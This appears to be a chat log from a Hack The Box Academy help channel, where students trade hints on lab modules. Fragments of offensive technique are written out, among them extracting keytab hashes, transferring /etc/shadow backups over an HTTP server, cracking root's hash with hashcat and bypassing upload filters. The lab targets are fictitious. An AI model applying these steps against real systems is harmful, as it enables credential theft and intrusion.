They warn you that in the lab environment it might take 1-2 minutes to run and maybe even more in a real large environment.

omg thank you I was able to read the passwd file before but I didn't try to read the flag...

Hey guys, i got this: Target: Target is spawning...
And it doesnt spawn 😮 It keeps loading and loading but nothing happens

Error: something went wrong. Thats what i get

can someone help me with the medium footprinting lab?

hi guys, i m stuck in the last question "Pass the Ticket (PtT) from Linux" "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01". i run linikatz, find the /etc/krb5.keytab file, that i use to extract hashes : python3 /opt/keytabextract.py /etc/krb5.keytab.
however, i cant crack the ntlm hashes, then i guess i m not using the right file. i looked a an htb forum and it says that we have to find a kt.file. but it doesn't work, ./home/carlos@inlanefreight.htb/.scripts/svc_workstations._all.kt
./home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt, thanks a lot

Skills Assessment - File Upload Attacks: question pls give me nudge...

refresh?

where are you stuck?

try to read the source code for the upload page

I tried to upload an svg to get the base64 of that page, it shows a broken picture, but nowhere the base64

can anyone help me with the hashcat modules?

strange, is your xml syntax correct?

resource=upload

try

I cant figure out what to do next to login to MSSQL

right click>run as administrator

with the sa creds you found

that's assuming they found them

it’s pretty easy to find ¯_(ツ)_/¯

while that is true: it's still an assummption

no joy, tried it with upload and upload.php. out stays the base64 of data i uploaded, and says it won't load the picture

strange, restart the machine and try again

how would i know that?, specifically the right click administrator part? like can you explain the logic behind how someoen could or how you could reach to that conclusion

if you log in as regular user it doesn't let you do anything, so a higher priv user is needed

Hey @fathom pendant may i PM you?

about?

Does anyone know where this comes from? ---> Which employee is suspected of performing potentially malicious actions in the real environment?, module ------> INTRO TO NETWORK TRAFFIC ANALYSIS

section---> Packet Inception, Dissecting Network Traffic With Wireshark

in some systems connecting to a service like an sql server require admin rights

Can someone give a nudge on where to go from here: right now i am doing the credential hunting in linux looking for will PW...I have kira rsa passphrase, i have her PW...i downloaded the two .bak files but they don't show anything in them...any other hints on where to look/what to run? I tried downloading lazagne, but it doesn't seem to be working. I get a no module error and i cannot run the exe...any assistance would be great - feel free to DM if need be

which module and section?

Firefox

iirc

password attacks/credential hunting in linux...

is anyone else having issues RDPing into the "LLMNR/NBT-NS Poisoning - from Windows" box for the Active Directory Enumeration & Attacks module? I seem to be able to RDP into all other windows machines in the other modules, however it appears as though this specific machine just hangs on a black screen when connected

@fathom pendant let me try that

Still testing other machines and it appears to work fine, its just the one box

the section is really helpful if you read it

also you won't be able to run the exe on the target

as it's a linux system

@fathom pendant - understood...trying the firefox portion of the section now

Press enter when that black screen appears a few times.

oh my good god thank you, I am a goofball

it claims another victim

It tricked me up too haha. No worries

I was stumped for a good while haha 😂

Anyone familiar with Intro to Windows Command Line module? I'm on the Finding Files and Directories page, and trying to find the waldo.txt file. I've tried several ways to input the "where" command and I'm either getting absolutely no response from the command or I'm getting an error message for the command.

strange

dir -recurs -filter waldo.txt -path / | select fullname

try

Able to find out, not sure why the process that it describes in this page doesn't work at all

on diferent points in the academy i found the real companys webside inlanefreight.com. It use sumtime the real website sumetime the included exploiteble mirrow.

My Question WHY?

is inlanefreight a fake company for testing or a they alowing do this?
its strange

inlanefreight is a fake company so that you have a target to attack.
The domain inlanefreight.htb is often used. For certain tasks, however, it is necessary to use com.

as Payload said, Inlanefreight is a ficticious company - if you actually look at the top of the website at the "Call Us" section the phone number is 1-800-HTB-8888, also the names of the CSuite execs on the About Us page are jokes (Jeremy Lastman, Chip Dollar)

they have to have some of the info be believable enough, purely due to some of the engagements

thanks @acoustic owl and @fathom pendant

Hello, i'm a supernewb so apologies if im on the wrong channel. I am having trouble understanding a part of LINUX FUNDAMENTALS , specifically Find Files and Directories. "If we hover the mouse over the respective options, a small window will appear with an explanation." Where do I hover? I've tried to hover over the commands in the command line, both before and after entering the command. I've also tried to hover over the green words on HTB Academy, and the commands above and below where this sentence is located. I don't have very good internet, so I have waited 1-3 minutes on each hover attempt. Any help would be greatly appreciated.

It's referring to the GUI

not to CLI

Attacking ColdFusion: shell never reaches me xd

anyone has experienced that

Thanks to #MarieLee

sorry I meant thank you @fathom pendant

why the heck using os.getenv() on Python3 messes up the string with some random color

wtf is that behaviour

WTF, It works on pwnbox, but shows the completely different result on VM. Are there any other labs with the same jokes?

Hello, folks. I have been working on Intrusion Detection With Splunk for a while now. I was able to answer all of the questions except for Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the two IP addresses of the C2 callback server. Answer format: 10.0.0.1XX and 10.0.0.XX
Can anyone please provide some guidance?

You can get it to work on vm after some restarting. But those issues where it works on pwnbox and not vm are few and far between

Did you navigate there?

Hello Folks !
I want to access hack the box windows privilege escalation course but I am not able to access it I have a VIP sub

this is the course https://academy.hackthebox.com/course/preview/windows-privilege-escalation

please help me

Last I checked the vip sub didn’t include academy. Check the page detailing the subscription and payment options to find one that meets your needs

They have an annual sub, a monthly cube sub, and a student plan

Navigate where? I have only been trying different Splunk queries. I am sorry, I am not sure if I understand.

awesome, i’ve never experienced it before

have anyone doen the thichh apllication section on attack appllication module jus i have a question after delting the hashs from the manifest files and changing the port and rebuilding the app you guys could lunch the client

what a stupid section

Module: Pivoting, Tunneling and Port Forwarding skills assessment: I've successfully pivoted to the second to last box via RDP, but all I can find is an old flag.txt? Any help would be much appreciated!

Can someone help with AD Enum & Attack Skills 2 > Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?

I was not able to get a clear txt password, but was able to get onto ms01 with a service account by PTH. I am not sure if I missed something.

Do I need to have the service account password to proceed?

I already answered you, read the question again

it said to submit the account name

no route to host means you aren’t connected to the academy vpn

Thank you I was asking about getting further along. I read were people got that password wasn’t sure if I needed to try and crack the hash.

then whyd you ask about an unrelated question

what’s the hostname?

what section is that?

you either think you are but you're not or you have the wrong IP

What bruh?

You dont have a path to the host

cool so youre connected to A vpn

looks like the academy vpn

reset the machine and try again

screenshot the connection information from where you spawned the machine

so you must rdp, ssh is a no go

restart your pc and try again

also don't run xfreerdp as root; it doesn't properly have a display variable set to use the display

i am working on the password attack module for password/shadow/opasswd portion and trying to ffile transfer but when i run http server and run this command : wget http://10.129.202.64:8000/etc/shadow.txt -o shadow2.txt or wget http://10.129.202.64:8000/etc/shadow -o shadow2.txt I get this error but it still downloads. Error 10.10.14.189 - - [05/Dec/2023 19:54:20] code 404, message File not found
10.10.14.189 - - [05/Dec/2023 19:54:20] "GET /etc/shadow.txt HTTP/1.1" 404 - isn't etc/filename the directory it is pulling from?

when you start an http server, it serves the file in the directory

you can't just arbitrarily choose a different directory

strange man

@fathom pendant i am running form here: will@nix01:/etc$ python3 -m http.server

which section are you doing

specifically

then you don't need to specify /etc/ you can just grab the filename directly

@fathom pendant I am sorry to bother you, but I am still stuck on this darn Splunk question

I haven't done this module

read the section again and try and figure it out

@fathom pendant so it runs and i get this

||10.10.14.189 - - [05/Dec/2023 19:59:12] "GET /shadow.txt HTTP/1.1" 404 -
10.10.14.189 - - [05/Dec/2023 20:00:04] code 404, message File not found
10.10.14.189 - - [05/Dec/2023 20:00:04] "GET /shadow.txt HTTP/1.1" 404 -||

and i get a file on my system called shadow2.txt, but not much really in it. even when removing the etc directory as such - wget http://10.129.202.64:8000/shadow -o shadow2.txt

is there a better way to transfer the files for this

wget should be fine, but I think you should be getting some .bak files instead

shadow.txt doesnt exist there

so even with an outputfile if it's empty you'll just get a blank output file

¯_(ツ)_/¯

@fathom pendant just tried a locate for passwd and find the bak ones in the different spot

yes

congrats, now run the web server there

that's intentional lol

awesome

awesome

Theres a YouTube vid and a post about double pivoting, very easy to follow

https://systemweakness.com/double-pivoting-for-newbies-with-ligolo-ng-4177b3f1f27b

What’s the difference between “nmap -sV { ip address} “ and “ nmap -p {ip address}”

well first off if you just do -p it's gonna probably throw an error, did you mean -p-?

Yes

-p- differs from a standard scan by scanning all 65k ports

a normal scan without specifying only scans the top 1000

the -sV flag simply tacks onto the scan to check for version of the service running

notably it isn't 100% reliable

Ok thanks

you also generally wanna run nmap with sudo

because of some port binding shenanigans

and protocol stuff

@lusty thicket I’m on the second to last question on the skills assessment for Pivoting and Tunneling. I used v*****’s pass to RPD into the next pivot but I can’t find the flag

iirc this one has access to some interesting files ;)

Excuse me where is Scanner ZAP ? for this exercice (excuse me I make htb exercices since this morning fatigue has been felt

Does anyone know what needs to be done to be able to speak on the community-content channel?

I have an issue on Attacking Common Services - Attacking FTP
https://academy.hackthebox.com/module/116/section/1165

I brute forced and got a user an PW but it is the creds for the section after, SMB. I got tired of waiting on the brute so I started plugging in user names and found the correct user that starts with "R" but I cant find creds for her using the provided word list and I cant ssh with her to get the flag

and rockyou plans on taking 1078:11h

Publish writeup I guess

What do you mean by the published article?

It won't let me write or share anything on the channel.

Did you verify your account?

How do I verify my account?

you need to verify your main htb account following the instructions in #welcome

nevermind, found a second pw list

it helps to learn how to read

why can't we "spend cubes" to get a look at a walkthrough video? i've been stuck on some thing for weeks but my only hope is for someone on discord to be nice enough to give me a nudge in the right direction, which is cool but I want to understand the lesson more than I want the answer. Sorry for venting but atp, f julio and this last PtH question lol

Aaa thankss

Lol, tell us what you did and someone will definitely guide you or give you an idea

because, barring tier 0 content, there shouldn't be a writeup for any academy module

for the most part, if you follow the section - you should be able to answer the questions

you likely overlooked something

I remember that during that module I got the admin hash, rather than using it as PTH I was cracking it for password

So some days are like that

the last PtH question, i'm assuming you mean the Linux01$ ticket?

I don't remember exactly which one but I do remember my stupidity

i suggest downloading and transferring the tool shown in the section to see where all the tickets are; hint: Linux01$ is in a different directory than the others

Thanks. I'm a million percent sure I'm overlooking something easy but its frustrating that I don't know what haha ... I think I've read every "How to PtH" article on teh internet haha

everything you need is honestly in the section

¯_(ツ)_/¯

I finally reached 95%

Having a full time job and university makes things hard for cpts

Apply the concepts taught in this section to obtain the password to the Vendor user account on the target. Submit the clear-text password as the answer. (Format: Case sensitive) im currently working on this question and i have the answer. i want to make sure that is right because its not going thru as right on the plataform. thanks in advance!

.make sure there no blank space

did you submit the answer? the platform doesn't penalize you for incorrect answers

Once I'm off from work I'll post my steps and properly ask for a hint. Thanks

but yeah as Shinobi said, make sure no spaces before and after

read the section again carefully, make sure to utilize all the tools shown

anonymous login is enabled in that section

I know it’s more so so I can complete the section for the module and stuff

Idk I can send it to someone to double check that I have the right answer

what module is this for?

I tried that one too

try refreshing the page and resubmitting

if it's the one i'm thinking it starts with a p

but without more info; can't help you

I will let it cool down for a little bit and come back at it later

But thanks for the help guys!

Still didn't answer the question of what module

so someone can actually help you

Hi I'm having a problem with the active information gathering module where when I use the command ||curl -I "http://${TARGET}"|| with the target being app.inlanefreight.local, I get the output of: curl: (6) Could not resolve host: app.inlanefreight.local. I'm currently lost and I have read through the other posts in the channel and none of the solutions have helped me. (edited) I just found the answer if you just try www.inlanefreight.com. Anyone know why it wont let me use the app.inlanefreight.local

because app.inlanefreight.local isn't a public website

you'd need to add an IP and the site to your /etc/hosts

www.inlanefreight.com is a real (fictitious) website

I just read that off of the forums and did so, which it it worked. I appreciate your help though :)!

do you need a htb acc to verify or htb academy acc to verify

htb acc, academy is separate

aii

use sudo echo ‘ip app.inlanefreight.local’ >> /etc/hosts

oh that's a nice way to not have to manually do it thank you!

need fing help with ATTACKING COMMON APPLICATIONS
Attacking Applications Connecting to Services

when i break at this point 0x0000000000001607 <+433>: call 0x11b0 SQLDriverConnect@plt

its not working

cannot access memory

i know why

its not a cirrect adress

but hy i dont see the 5555

before it

i got the credntials only because i used the adress given in the example

HELP

so the question is why is my gbd not showing the full memory address?

never mind

found the correct one...

I can't understand why the command 'proxychain remmina' is not opening up a windows desktop . I thought that is what that command was supposed to do.

"Using the concepts taught thus far, connect to the target and establish an ICMP tunnel. Pivot to the DC (172.16.5.19, victor:pass@123) and submit the contents of C:\Users\victor\Downloads\flag.txt as the answer. "

https://academy.hackthebox.com/module/158/section/1438

If I can see this correctly on the print screen, then remmina opens. Now you just have to enter the IP and creds.

I actually just completed it. ||My issue was that I tried to run the smb ps but it yelled at me so I put .\ and the extension on it. It didn't yell at me but it didn't give me a PID either. Me being LAZY I just switched SMB with WMI and ran it again. Again, it didn't bark at me but again I didn't get a PID. After rereading the module for the 50leven time I finally caught my mistake - removing the '.' and extension from my command finally gave me a connection. I think venting in here was the real answer haha.||

I can't type anythint in the RDP box or elsewhere. ..its like everything is greyed out

You can't write anything here?
You can't click on the little plus icon next to the search either?

Currently on the File Upload Vulns module, and I have to run an intruder that will take around 6000 requests...

This is obviously not doable with the community edition, any ideas?

the wordlist you’re to use is not that large

I know, but it's like 21 * 45 * 5 or 6

Not at all Mr Bunny. I clicked multiple times

i don’t recall

I can give more details but I'm not sure how many are too many

what section are you talking about?

File types

Where you have to adjust File extension, Content type and MIME type

type filters?

Oh yeah, sorry

okay.

focus on trying double extensions and using the GIF8 mimetype

that’s it

Will do, thank you

nothing else work use magic bro

other section i think btw

dont pay no imind to me hahaha

password attacks Attacking LSASS section

password starts with M

i got the right one, it might be another issue

i will see what i can do thanks for the confirmation again

Nevermind . I fixed that issue. It turned out I had to type the IP address in the RDP slot before it greyed out. Very strange

Anyone on Intro to Assembly Language and wanna chat??

You started that course?

Hi there, I need help with something related HTB module, shells and payloads live engagment. For this task, when connecting using xfreerdp to the initial foothold, I couldn't find a browser installed, is this done on purpose or something else is wrong ?

I did

what's the level of difficulty for you?

I'd say high end of easy to mid level medium. I think Im starting to wrap my head around WHAT is happening, not exactly sure HOW it is happening tho.

Now that Im kinda thinkin out loud, probably more into the medium than easy honestly. I feel like I'm on the brink of something clicking in my brain tho

I’m doing “Linux Fundamentals” atm. Can someone explain what redirecting STDIN actually does. I’m not sure what the difference is between
cat test.txt
&
cat < test.txt

there’s no difference

in the first example you’re reading the test.txt file directly in the second example you’re taking the test.txt input and feeding it to the cat cmd

^ This

Hellow everyone, a question, when I spawn a lab target, am I the only one who can access it or other students also have access to that?

yes, only you have access to that target

thank you!

I don't know where to say but
Where I can report a typo of a module??

Hello. In the module ACL Enumeration from Active Directory Enumeration & Attacks, on the last question, the Get-DomainObjectACL from Powerview it's taking too long to run. I mean after 15 minutes, it's still running. I restarted the machine, waited 10 minutes for everything to start, but it's taking too long and I don't know why.

#858470491676737536

you should probably target specific objects, that queries all objects be default which is a lot of data

Hmm.. I'm targeting a user and a group. The results are the same. I lost 3-4 hours on this question.

tried using bloodhound?

No, but i think i will switch to bloodhound in the end.

did anyone complete the attack common application befor the 03/2023

check your lhost

you should, bloodhound is crucial for AD

Did anyone managed to get the flag from the Bypassing CSRF Tokens via CORS Misconfigurations(Advanced XSS and CSRF Exploitation module)? Seems like the code from the class is not working as I can't promote the lowpriv user to Admin and get the missing flag :/

attack common application

anyone faced thsi issue befor

can anyone explainn why i need to run the cmnd twice to see the other dump

Hey, I'm stuck on the medium lab of the Footprinting module. Can someone help? I'll share what I already found privately

What are you stuck on and what have you found

Got stuck with the creds for sa, but I just tried the password as the Administrator and it worked so i'm fine for now. Thanks anyways!

Module:Attacking common applications Section:WordPress - Discovery & Enumeration --------im stuck on finding the flag.txt file -- fuzzed all directories with no success, tried brute-force admin, WordPress Plugin Event Registration 5.4.3 - SQL Injection -- what can i do? any hint?

Doing the getting started module on the public exploits section, when i get to the end and try to use the exploit i just get this as the output: [msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> run

[] Scanned 1 of 1 hosts (100% complete)
[] Auxiliary module execution completed

Anyone know why i'm not getting anything?

did you set the right RHOST and RPORT?

Yeah and the right filepath, reset the target server and it still gives me nothing

are you sure it's the right filepath, what happens when you leave it as default

I get the same output if i leave it as the /etc/passwd

then something is wrong with your OPTIONS part

What do you mean by that?

type options in the msfconsole

your RHOSTS should just be an IP

not IP:PORT

just the public x.x.x.x

oh right, yes it looks fine, rhosts is just the ip, rport is just the port and filepath is just/flag.txt

literally just ran it myself and got it the answer

when it's run it will save it to a loot file

in ~/.msf4/loot/

or ~/.msf/loot/

if you scroll up does it give you a line like
[+] File Saved In:

can i dm you so i can send a screenshot?

sure

your filepath is wrong

read the question again

oh woops that was just a typo when i redid it to get a clearer screenshot

making it /flag.txt doesnt solve it

i don’t think metasploit is the only way to achieve code execution in that section

you can do the manual way; but that's not the point of the section tbh

as an intro module: they're really just showing off an example

can anyone lend some advice on this? trying to run hashcat against the root encrypted pw found for the password attack/password/shadow/opasswd module....still not working...i can show the hash i have but it beings with this ||$6$Xe|| and ends with the bin/bash

you only need everything prior to the 0:0:/root:/bin/bash

@fathom pendant ah ok - let me try

the rest is just the home and default shell interpreter

gotcha...those little things make a difference - thanks for the tip

try putting single quotes around 'htb-student'

In Linux Fundamentals, there's a question asking to find a path to htb-student's mail... There was nothing that talked about mail in the section and there is nothing in the home directory. What is this question talking about?

I believe if you check the env variable it should give the path to it

oh, wow that's really useful. Thanks!

Module:Attacking Web Apps Section:WordPress - Discovery & Enumeration ---- any hint how i can find the flag.txt file?

anyone who can help me..

any mods or someone else

@fathom pendant - so i made it stop at the end here ||qhXg.|| and then ran this - ||hashcat -m 1800 -a 0 root.txt /usr/share/wordlists/mut_password2.list.txt -o crack.txt|| and these : ||hashcat -m 1800 -a 0 -o root.txt /usr/share/wordlists/rockyou.txt -O

john --wordlist=/usr/share/wordlists/rockyou.txt root.txt||

but still get nothing cracked correctly with either....i know something may be off but can figure out what it is. Any help on what may be messing up here?

is the hashcat mode correct

nvm it should be

yeah...i can't quite figure out the issue

just take one line at a time

¯_(ツ)_/¯

ok

you can also try recreating the file

is the part i need also including of the portions after the "." in the full download of the encrypted hash?

i don't recall needing to do anything really extra with it

or just the first portion up the the first period

first period?

i don't recall that being an issue but...yeah... ||zOu.cVaww01u.6dS||

you need the full thing

the only delimiter for the hash is the :

helo @fathom pendant do you know how to register our university on university ctf

this isn't the right chat #1170841042610827275

that's what i thought...let me retry some other things...and should i use the mutated list or can i just use rockyou?

mutated list

ok

@fathom pendant - ok finally got it figured out - i recreated the txt file - then i ran this ||hashcat -m 1800 -a 0 --show -o nice.txt root.hash /usr/share/wordlists/mut_password2.list
chmod 600 nice.txt
cat nice.txt|| - not sure why, but it worked and got the PW

got it?

hello , I am in Cron job abuse Linux privilege escalation , I found the flag . But still not sure how can I find the cron job using pspy ? can someone please explain ?

Pspy shows you whenever a new process starts and with what parameters. If you let it run for a while and a cronjob runs during that time then it will show up in the output

If you let it run longer it’ll show up several times and then you know it’s some kind of cronjob and you can check if you can abuse it somehow

thank you 🐐

Hi can you please help me with this, AD assessment part Submit the contents of the flag.txt file on the Administrator desktop on MS01. I have chiser setup as well, but ping sweep via proxychains takes too long. how did you found the IP of the MS01? and how did you connect? I spent 1 day on this and gonna die tonight 😄

ping MS01